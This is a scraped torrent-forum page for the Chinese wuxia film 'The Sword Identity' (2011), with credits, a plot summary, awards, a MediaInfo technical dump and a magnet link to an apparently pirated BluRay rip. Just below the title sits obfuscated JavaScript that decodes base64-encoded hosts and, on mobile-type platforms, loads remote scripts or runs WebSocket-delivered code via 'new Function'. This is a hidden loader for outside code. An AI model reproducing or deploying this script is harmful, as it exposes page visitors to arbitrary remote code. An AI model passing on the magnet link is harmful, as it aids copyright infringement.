倭寇的踪迹[国语音轨/简繁字幕]The.Sword.Identity.2011.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit-迅雷下载 7.43GB

版主小s 23天前 219

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 The Sword Identity

◎片 名 倭寇的踪迹

◎年 代 2011

◎产 地 中国大陆

◎类 别 剧情 / 动作 / 武侠 / 古装

◎语 言 汉语普通话

◎上映日期 2011-09-06(威尼斯电影节) / 2012-02-24(中国大陆)

◎IMDb评分 5.4/10 from 541 users

◎IMDb链接 https://www.imdb.com/title/tt2044077

◎豆瓣评分 7.2/10 from 27695 users

◎豆瓣链接 https://movie.douban.com/subject/6425116/

◎片 长 108分钟

◎导 演 徐浩峰 Haofeng Xu

◎编 剧 徐浩峰 Haofeng Xu

◎主 演 于承惠 Chenghui Yu

宋洋 Yang Song

赵圆圆 Yuanyuan Zhao

马君 Jun Ma

徐鸥仪 Fujing Xu

马可 Ke Ma

刘哲欣 Zhexin Liu

姚未平 Weiping Yao

欧克勤 Keqin Ou

李桂生 Guisheng Li

薄冰 Bing Bo

米娃·木拉提 Miva Mulati

肖勒娜依·艾尼 Xiaolenayi Aini

哈斯艳·叶尔肯 Hasiyan Yeerken

陈建兴 Chen Jianxing

刘章印 Zhangyin Liu

◎标 签 武侠 | 动作 | 2012 | 剧情 | 中国大陆 | 功夫 | 古装 | 黑色幽默

◎简 介

万历年间,天下太平。早年倭寇横行,幸得戚继光和俞大猷两位将军平定,终于换得今日的内外祥和。此时武林由四大家族坐镇,任何人试图开宗立派须经四大门派同意方可。某天,城内刀光四起,两名手持倭刀的神秘之人令武林大乱阵脚。当年戚继光从倭刀的持法中悟出玄机,因此对倭刀进行改良,以彼之道还之彼身,令倭寇闻风丧胆。随着戚继光去世和天下安定,戚家倭刀渐渐失传,中原武林也斥之为邪道不予承认。这二人正是戚家军营的高手,他们挑战四大门派,只望为戚家倭刀正名。而武林各派也干脆将他们当作倭寇予以围捕,连归隐山中多年的霜叶城第一高手裘冬月(于承惠 饰)也下山擒贼……

◎获奖情况

第68届威尼斯电影节(2011)

地平线单元奖 最佳影片(提名) 徐浩峰

第48届台北金马影展(2011)

金马奖 最佳改编剧本(提名) 徐浩峰

金马奖 最佳新导演(提名) 徐浩峰

第13届华语电影传媒大奖(2013)

最佳新导演(提名) 徐浩峰

第19届北京大学生电影节(2012)

最佳导演奖(提名) 徐浩峰

最佳编剧奖(提名) 徐浩峰

最佳处女作奖(提名) 徐浩峰

艺术探索奖

  1. General

  2. Unique ID : 259977415679057804582067770813319464795 (0xC395D437837C22D6C541B29BC2E3C75B)

  3. Complete name : The.Sword.Identity.2011.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.43 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 9 648 kb/s

  10. Encoded date : UTC 2021-07-09 06:09:56

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 50 min

  20. Bit rate : 6 393 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 040 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.133

  30. Stream size : 4.92 GiB (66%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 6393 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=158735 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 50 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 230 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.49 GiB (33%)

  57. Title : Mandarin DTS-HD Master Audio 5.1 @ 3230 kbps

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 45 min

  67. Bit rate : 10.8 kb/s

  68. Count of elements : 1728

  69. Stream size : 8.11 MiB (0%)

  70. Title : Chs/SUP 简体

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 45 min

  80. Bit rate : 11.1 kb/s

  81. Count of elements : 1728

  82. Stream size : 8.38 MiB (0%)

  83. Title : Cht/SUP 繁体

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Menu

  88. 00:00:00.000 : en:第 01 章

  89. 00:07:00.250 : en:第 02 章

  90. 00:14:57.458 : en:第 03 章

  91. 00:21:51.083 : en:第 04 章

  92. 00:28:31.208 : en:第 05 章

  93. 00:34:34.708 : en:第 06 章

  94. 00:42:35.708 : en:第 07 章

  95. 00:52:32.208 : en:第 08 章

  96. 00:58:40.625 : en:第 09 章

  97. 01:08:34.083 : en:第 10 章

  98. 01:15:23.208 : en:第 11 章

  99. 01:21:57.583 : en:第 12 章

  100. 01:28:15.625 : en:第 13 章

  101. 01:32:14.250 : en:第 14 章

  102. 01:41:14.875 : en:第 15 章

  103. 01:47:59.041 : en:第 16 章


TAGS 武侠 动作 剧情 古装

磁力链:
  • magnet:?xt=urn:btih:D1E9569E58423FA3E0946279237A5B1C38F46C15
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回